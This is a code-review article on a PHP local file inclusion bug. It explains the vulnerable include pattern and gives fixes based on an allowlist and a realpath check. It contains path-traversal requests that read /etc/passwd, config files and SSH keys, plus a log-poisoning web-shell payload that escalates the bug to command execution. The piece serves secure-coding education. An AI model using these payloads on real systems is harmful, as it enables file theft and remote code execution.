
Code Review: Local File Inclusion via Unsanitized User Input

A PHP file inclusion pattern with zero input validation allowed an attacker to read arbitrary files from the server filesystem — including sensitive configuration files and system credentials.

Tags: lfi, php, file-inclusion, code-review, path-traversal

Most LFI vulnerabilities don’t come from complex logic. They come from a single line of code where a developer trusted user input they never should have.

This one is a classic — a PHP application that dynamically loads page templates based on a URL parameter. Clean, maintainable code on the surface. A complete disaster underneath.


The Code

<?php

function loadPage($page) {
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page;
    
    if (file_exists($file)) {
        include($file);
    } else {
        echo "Page not found.";
    }
}

$page = $_GET['page'];
loadPage($page);

?>

Read it carefully. The vulnerability is right there in plain sight.


Breaking It Down

The intent is simple — load a page template based on a URL parameter:

https://target.com/index.php?page=home.php
https://target.com/index.php?page=contact.php
https://target.com/index.php?page=about.php

The developer assumed users would only ever pass valid page names. They built the happy path and never considered what an attacker would send instead.

Here’s the flow:

  1. $_GET['page'] takes the page parameter directly from the URL — no sanitization, no validation
  2. It gets concatenated directly onto $basePath, with no path normalization
  3. file_exists() checks if the resulting path exists — any valid path on the filesystem passes this check
  4. include() loads and executes the file — including files way outside the intended directory

The Vulnerability — Path Traversal + LFI

Because $page is never sanitized, an attacker can use ../ sequences to traverse up the directory tree and reach any file the web server process is able to read.

Attack 1 — Read /etc/passwd:

GET /index.php?page=../../../../etc/passwd

The resolved path becomes:

/var/www/html/pages/../../../../etc/passwd
→ /etc/passwd

file_exists() returns true. include() reads and outputs the entire file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
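
The path resolution in Attack 1 can be reproduced without touching a real filesystem. The sketch below uses a hypothetical helper, collapseDots(), which is not part of the original application. It collapses "." and ".." segments purely lexically and ignores symlinks, so treat it as an approximation of what the operating system does, not a replacement for realpath().

```php
<?php
// Hypothetical helper (not from the original code): collapses "." and ".."
// segments in an absolute POSIX-style path. Purely lexical: it does not
// touch the filesystem and does not resolve symbolic links.
function collapseDots(string $path): string {
    $stack = [];
    foreach (explode('/', $path) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;               // skip empty and current-directory segments
        }
        if ($segment === '..') {
            array_pop($stack);      // step up; at the root this is a no-op
            continue;
        }
        $stack[] = $segment;
    }
    return '/' . implode('/', $stack);
}

$basePath = '/var/www/html/pages/';
echo collapseDots($basePath . 'home.php'), "\n";                // /var/www/html/pages/home.php
echo collapseDots($basePath . '../../../../etc/passwd'), "\n";  // /etc/passwd
```

Four ../ segments are enough here because the base path is four directories deep. Extra ../ segments are harmless to the attacker, since stepping up from the root stays at the root.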

Attack 2 — Read application config with database credentials:

GET /index.php?page=../config/database.php

Resolved path:

/var/www/html/pages/../config/database.php
→ /var/www/html/config/database.php

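One caveat: include() executes PHP files rather than printing them, so a config file made up entirely of PHP code runs silently and its source is not displayed. Configuration kept in a non-PHP format alongside the application (a .env or .ini file, for example) is output verbatim, and if it holds hardcoded credentials the attacker now has the database username, password, and host.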

Attack 3 — Read SSH private keys:

GET /index.php?page=../../../../home/deploy/.ssh/id_rsa

If the web server user has read access to that file, the private key is exfiltrated. Game over.


Why file_exists() Doesn’t Help

A common misconception is that checking file_exists() before including provides some protection. It doesn’t.

file_exists() returns true for any file that exists on the filesystem — not just files in the intended directory. It’s a filesystem check, not a security control. All it does here is avoid a PHP warning. An attacker only needs to target files that actually exist, which is trivially easy.
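
A minimal sketch of that behaviour, assuming a throwaway directory layout created under the system temp directory (the lfi_demo_ prefix and file names are made up for illustration):

```php
<?php
// Build a temporary layout (hypothetical names):
//   <tmp>/lfi_demo_xxx/pages/home.php   intended template
//   <tmp>/lfi_demo_xxx/secret.txt       file outside the pages directory
$root = sys_get_temp_dir() . '/lfi_demo_' . uniqid();
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home.php', 'home');
file_put_contents($root . '/secret.txt', 'secret');

$basePath = $root . '/pages/';

$insideExists  = file_exists($basePath . 'home.php');       // intended file
$outsideExists = file_exists($basePath . '../secret.txt');  // traversal target
$missingExists = file_exists($basePath . '../nope.txt');    // nonexistent file

var_dump($insideExists, $outsideExists, $missingExists);

// Clean up the temporary files
unlink($root . '/pages/home.php');
unlink($root . '/secret.txt');
rmdir($root . '/pages');
rmdir($root);
```

The first two checks both come back true. The only request the check filters out is the one for a file that does not exist at all.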


Going Further — LFI to RCE

In certain conditions, LFI can be escalated to Remote Code Execution:

Log Poisoning — if the attacker can write to a log file (e.g. Apache access log via a crafted User-Agent header) and then include that log file through the LFI, any PHP code in the log gets executed:

GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

Then:

GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id

The PHP code embedded in the log executes and returns command output. LFI just became RCE.
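
The reason this works is that include() parses any file it is given and runs whatever sits between PHP tags, regardless of the file's name or extension. The sketch below shows this with a temporary file standing in for a log. The log line format and the harmless arithmetic payload are assumptions chosen for the demo, not real Apache output.

```php
<?php
// Write a fake "log" line containing a harmless PHP snippet (hypothetical content).
$logFile = tempnam(sys_get_temp_dir(), 'lfi');
file_put_contents($logFile, "127.0.0.1 - - \"GET / HTTP/1.1\" 200 \"<?php echo 6 * 7; ?>\"\n");

// Capture what include() emits instead of printing it directly.
ob_start();
include $logFile;
$rendered = ob_get_clean();

// Raw bytes on disk, for comparison with the rendered output.
$raw = file_get_contents($logFile);
unlink($logFile);

echo $rendered;
```

The text around the PHP tags is passed through unchanged, while the embedded expression is evaluated and replaced by its result. The same mechanism explains why including a pure-PHP file shows no source code.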


Root Cause

One line is responsible for everything:

$page = $_GET['page'];  // ← raw user input, zero validation

The developer made two assumptions that attackers invalidate immediately:

  1. Users will only pass filenames, not directory traversal sequences
  2. The base path prefix provides containment — it doesn’t

The Fix

Fix 1 — Whitelist allowed pages:

<?php

function loadPage($page) {
    // Define exactly which pages are allowed — nothing else
    $allowedPages = ['home', 'about', 'contact', 'services'];
    
    if (!in_array($page, $allowedPages, true)) {
        http_response_code(404);
        echo "Page not found.";
        return;
    }
    
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page . '.php';
    include($file);
}

$page = $_GET['page'] ?? 'home';
loadPage($page);

?>

Fix 2 — Resolve the real path and validate it stays within the base directory:

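<?php

function loadPage($page) {
    $basePath = realpath('/var/www/html/pages');

    // Reject non-string input (e.g. ?page[]=x) before building a path
    if ($basePath === false || !is_string($page)) {
        http_response_code(404);
        echo "Page not found.";
        return;
    }

    // realpath() returns false if the target does not exist
    $requestedPath = realpath($basePath . DIRECTORY_SEPARATOR . $page);

    // Ensure the resolved path starts with the base path plus a trailing
    // separator, so a sibling such as /var/www/html/pages_old cannot match,
    // and that the target is a regular file rather than a directory
    if ($requestedPath === false
        || strpos($requestedPath, $basePath . DIRECTORY_SEPARATOR) !== 0
        || !is_file($requestedPath)) {
        http_response_code(403);
        echo "Access denied.";
        return;
    }

    include($requestedPath);
}

// This variant takes the full filename, so the default includes the extension
$page = $_GET['page'] ?? 'home.php';
loadPage($page);

?>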

realpath() resolves all ../ sequences and symbolic links to the canonical filesystem path, and returns false if the target does not exist. The strpos() check then confirms the resolved path still lives inside the intended base directory. If it does not, the request is denied.

Apply both fixes together. The whitelist prevents unknown filenames. The realpath() check prevents traversal even if the whitelist is somehow bypassed.
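
One way the two checks might be combined is sketched below. The helper name resolvePage(), its signature, and the temp-directory demo are assumptions made for illustration and are not taken from the original application. The helper returns a path to include, or null when the request should be rejected.

```php
<?php
// Hypothetical helper combining both checks. Returns the canonical path of
// the template to include, or null if the request should be rejected.
function resolvePage($page, string $baseDir, array $allowedPages): ?string {
    // 1. Allowlist: strict comparison also rejects arrays and other non-strings.
    if (!in_array($page, $allowedPages, true)) {
        return null;
    }

    // 2. Containment: canonicalize, then require the base directory as prefix.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strpos($path, $prefix) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// Demo against a throwaway directory so the sketch runs anywhere.
$root = sys_get_temp_dir() . '/lfi_fix_' . uniqid();
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home.php', 'home');
file_put_contents($root . '/secret.php', 'secret');

$pages   = $root . '/pages';
$allowed = ['home', 'about'];

$ok        = resolvePage('home', $pages, $allowed);        // allowed and present
$traversal = resolvePage('../secret', $pages, $allowed);   // not on the allowlist
$missing   = resolvePage('about', $pages, $allowed);       // allowed, but no file
$notString = resolvePage(['home'], $pages, $allowed);      // array input
// Simulate a misconfigured allowlist to exercise the second layer on its own.
$bypass    = resolvePage('../secret', $pages, ['home', '../secret']);

var_dump($ok !== null, $traversal, $missing, $notString, $bypass);

unlink($root . '/pages/home.php');
unlink($root . '/secret.php');
rmdir($root . '/pages');
rmdir($root);
```

Only the first call yields a path. The last call shows the point of layering: even with a traversal string mistakenly placed on the allowlist, the containment check still rejects it.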


Key Takeaways

  • Never pass user input directly to include(), require(), fopen(), or any filesystem function — always validate first
  • file_exists() is not a security control — it checks existence, not authorization
  • Whitelisting is always stronger than blacklisting — define what’s allowed, reject everything else
  • realpath() is your friend — it collapses traversal sequences before you validate the path
  • LFI is not just information disclosure — in the right conditions it escalates to full RCE via log poisoning or file upload chaining
